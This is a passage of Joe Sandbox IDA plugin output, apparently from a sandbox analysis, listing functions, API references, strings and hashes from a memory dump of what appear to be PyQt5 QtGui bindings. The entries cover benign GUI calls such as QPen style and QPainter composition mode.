Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Direction@$?textInlineLayoutObject@@Qt@@Text
String ID: QTextInlineObject$textDirection$textDirection(self) -> Qt.LayoutDirection
API String ID: 3658053904-2461923447
Opcode ID: f71f05174e453f1c1f6cafeab731e453a346df749649a35ff4db4c13795627eb
Instruction ID: bda983e663e0f09d52a5c256fd471827006be662f3f6863836c88e7cdce93ef6
Opcode Fuzzy Hash: f71f05174e453f1c1f6cafeab731e453a346df749649a35ff4db4c13795627eb
Instruction Fuzzy Hash: 9201E975B08A4682EB00DF59E8A86AD37A4FB44BA4F954072CA5D43330DF7CD949C340

Function 00007FFD86288F80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

?tabFocusBehavior@QStyleHints@@QEBA?AW4TabFocusBehavior@Qt@@XZ.QT5GUI ref: 00007FFD86288FCB

Strings

tabFocusBehavior(self) -> Qt.TabFocusBehavior, xrefs: 00007FFD86288FF3
tabFocusBehavior, xrefs: 00007FFD86288FFF
QStyleHints, xrefs: 00007FFD86289006

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Behavior@Focus$?tabHints@@Qt@@Style
String ID: QStyleHints$tabFocusBehavior$tabFocusBehavior(self) -> Qt.TabFocusBehavior
API String ID: 352197009-2510846329
Opcode ID: d98b709ed56301d338e3c08d636f06f87b9d08b47949a8f2e2999e318dcb1275
Instruction ID: a7e339632f6f96e401dfba74bcf78eee194f4b18ed5e33fd757471eac5dbd180
Opcode Fuzzy Hash: d98b709ed56301d338e3c08d636f06f87b9d08b47949a8f2e2999e318dcb1275
Instruction Fuzzy Hash: B5010875B08A46D1EB00DF65E8A86AD37A8FB94BA4F954072CA4D47320DF7DDD89C380

Function 00007FFD86297000 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?fillRule@QPainterPath@@QEBA?AW4FillRule@Qt@@XZ.QT5GUI ref: 00007FFD8629704B

Strings

fillRule, xrefs: 00007FFD8629707F
QPainterPath, xrefs: 00007FFD86297086
fillRule(self) -> Qt.FillRule, xrefs: 00007FFD86297073

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Rule@$?fillFillPainterPath@@Qt@@
String ID: QPainterPath$fillRule$fillRule(self) -> Qt.FillRule
API String ID: 2580652039-3821843539
Opcode ID: 3f347e52f1392b27f08d59e9683e8051850e8ee5ae5e59038967985036febe95
Instruction ID: 59198be1d6bb8c55e42995fba9396628aaaa4f02678670ec03cadae516b6cd88
Opcode Fuzzy Hash: 3f347e52f1392b27f08d59e9683e8051850e8ee5ae5e59038967985036febe95
Instruction Fuzzy Hash: 1B010C75B08A46D1EB00DF65E8A86AD37A4FB44BA4F954072CA5D43320DF7DD94AC740

Function 00007FFD86258FF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?clearProperty@QTextFormat@@QEAAXH@Z.QT5GUI ref: 00007FFD86259040

Strings

clearColumnWidthConstraints(self), xrefs: 00007FFD86259063
clearColumnWidthConstraints, xrefs: 00007FFD8625906F
QTextTableFormat, xrefs: 00007FFD86259076

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?clearFormat@@Property@Text
String ID: QTextTableFormat$clearColumnWidthConstraints$clearColumnWidthConstraints(self)
API String ID: 55445122-3772274284
Opcode ID: e6041a302c26ef029cd0e461613ed632ebe4446358e88a7fe4a515b0ca4cf479
Instruction ID: 9c717a67505f36e121a75af68efd619283fa227798f54c22da0185d10f227b26
Opcode Fuzzy Hash: e6041a302c26ef029cd0e461613ed632ebe4446358e88a7fe4a515b0ca4cf479
Instruction Fuzzy Hash: D7010C35B08B46D1EB009F55E8A96AD33B4FB44BA4F954072CA5D03720DF7DD98AC340

Function 00007FFD86253040 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?type@QTouchDevice@@QEBA?AW4DeviceType@1@XZ.QT5GUI ref: 00007FFD8625308B

Strings

type(self) -> QTouchDevice.DeviceType, xrefs: 00007FFD862530B3
QTouchDevice, xrefs: 00007FFD862530C6
type, xrefs: 00007FFD862530BF

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?type@DeviceDevice@@TouchType@1@
String ID: QTouchDevice$type$type(self) -> QTouchDevice.DeviceType
API String ID: 1778909537-2997298401
Opcode ID: b0a30e5fd5155eabfc67723a7a8916162daa600089e5a5b72695964e3a820dbc
Instruction ID: d66877d4b3a0b4b31d8f358f3455e1ac01e36f233c982254a3a5549c66d2539d
Opcode Fuzzy Hash: b0a30e5fd5155eabfc67723a7a8916162daa600089e5a5b72695964e3a820dbc
Instruction Fuzzy Hash: D101E935B08B8AD1EB00DF65E8A86AD37A4FB84BA4F954072CA4D43320EF7DD959C740

Function 00007FFD86288C60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?capStyle@QPainterPathStroker@@QEBA?AW4PenCapStyle@Qt@@XZ.QT5GUI ref: 00007FFD86288CAB

Strings

capStyle, xrefs: 00007FFD86288CDF
QPainterPathStroker, xrefs: 00007FFD86288CE6
capStyle(self) -> Qt.PenCapStyle, xrefs: 00007FFD86288CD3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Style@$?capPainterPathQt@@Stroker@@
String ID: QPainterPathStroker$capStyle$capStyle(self) -> Qt.PenCapStyle
API String ID: 1887693362-3093352730
Opcode ID: ac2f3751acb0fbb473db248c0adadee11f3453836efc53df1267cd085bf3d36f
Instruction ID: f4c14282dc42437d4aa2a102c09bf2a80fea0ca567823312705286474a2e49bb
Opcode Fuzzy Hash: ac2f3751acb0fbb473db248c0adadee11f3453836efc53df1267cd085bf3d36f
Instruction Fuzzy Hash: 5301E575B08A46D1EB00DF69E8A86AD37A4FB84BA4F954072CA4D43330DF7CD949C380

Function 00007FFD86222D80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?objectIndex@QTextObject@@QEBAHXZ.QT5GUI ref: 00007FFD86222DCB

Strings

QDoubleValidator, xrefs: 00007FFD86222E06
notation, xrefs: 00007FFD86222DFF
notation(self) -> QDoubleValidator.Notation, xrefs: 00007FFD86222DF3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?objectIndex@Object@@Text
String ID: QDoubleValidator$notation$notation(self) -> QDoubleValidator.Notation
API String ID: 2711495105-2530989842
Opcode ID: c1baeeab509eeb5ea66e4a46222e96db2ebdff7ad750adb70761a04059ce19ad
Instruction ID: 2bdba58267a1175973bee6ccace3d0b6d89734fd27f222402f88f34c3f9d8946
Opcode Fuzzy Hash: c1baeeab509eeb5ea66e4a46222e96db2ebdff7ad750adb70761a04059ce19ad
Instruction Fuzzy Hash: B3014875B08A46C1EB00DF64E8A86AD37A8FB44BA0F954072CA4D43330DF7CD99AC340

Function 00007FFD86276D60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?depth@QOpenGLTexture@@QEBAHXZ.QT5GUI ref: 00007FFD86276DAB

Strings

profile(self) -> QSurfaceFormat.OpenGLContextProfile, xrefs: 00007FFD86276DD3
profile, xrefs: 00007FFD86276DDF
QSurfaceFormat, xrefs: 00007FFD86276DE6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?depth@OpenTexture@@
String ID: QSurfaceFormat$profile$profile(self) -> QSurfaceFormat.OpenGLContextProfile
API String ID: 997115272-3318827156
Opcode ID: 4d50a8aa5c0460fd67c890eb09669f4362689d196eca1fd60096cce12bb44129
Instruction ID: c924bb22c0fd7224a197079b958bd0691ae1e7093f21da239daf540e8e884d12
Opcode Fuzzy Hash: 4d50a8aa5c0460fd67c890eb09669f4362689d196eca1fd60096cce12bb44129
Instruction Fuzzy Hash: 61012575B08A46C1EB009F64E8A96AD37A4FB54BA0F954072CA0D43320DF7CD98AC740

Function 00007FFD86280E30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?compositionMode@QPainter@@QEBA?AW4CompositionMode@1@XZ.QT5GUI ref: 00007FFD86280E7B

Strings

QPainter, xrefs: 00007FFD86280EB6
compositionMode, xrefs: 00007FFD86280EAF
compositionMode(self) -> QPainter.CompositionMode, xrefs: 00007FFD86280EA3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?compositionCompositionMode@Mode@1@Painter@@
String ID: QPainter$compositionMode$compositionMode(self) -> QPainter.CompositionMode
API String ID: 1779194522-2112063232
Opcode ID: d834e51cb8bb7f3e2c53e56ec2bc6f018880d6e29fa68c6fb9a08e10d602b8bc
Instruction ID: 1e891cef812bc9cf23638400a7903ef542d3d3935ea7f271b3508e4047067b7f
Opcode Fuzzy Hash: d834e51cb8bb7f3e2c53e56ec2bc6f018880d6e29fa68c6fb9a08e10d602b8bc
Instruction Fuzzy Hash: EF01E975B08B8681EB009F65E8A86AD37A4FB84B65F964072CA5C43320DF7DD989C740

Function 00007FFD8625EE30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

?style@QPen@@QEBA?AW4PenStyle@Qt@@XZ.QT5GUI ref: 00007FFD8625EE7B

Strings

style(self) -> Qt.PenStyle, xrefs: 00007FFD8625EEA3
style, xrefs: 00007FFD8625EEAF
QPen, xrefs: 00007FFD8625EEB6

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?style@Pen@@Qt@@Style@
String ID: QPen$style$style(self) -> Qt.PenStyle
API String ID: 3466556262-2426322327
Opcode ID: 1c4f08520bc87782010e7e3efc72667dee3a7979da495315e9fbec3f6f10ec9d
Instruction ID: c65f3136aae7528f19d04cb83d2e62c3dee0c76159f3a2c7cc00fcacc7c9662a
Opcode Fuzzy Hash: 1c4f08520bc87782010e7e3efc72667dee3a7979da495315e9fbec3f6f10ec9d
Instruction Fuzzy Hash: 6301E975B08A4681EB00AF55E8A96AD37A4FB98BA4F954072CA4D43320DF7DED4AC740

Function 00007FFD86248AD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFD86248B24

Strings

QPixelFormat, xrefs: 00007FFD86248B49
brightnessSize, xrefs: 00007FFD86248B42
brightnessSize(self) -> int, xrefs: 00007FFD86248B36

Memory Dump Source

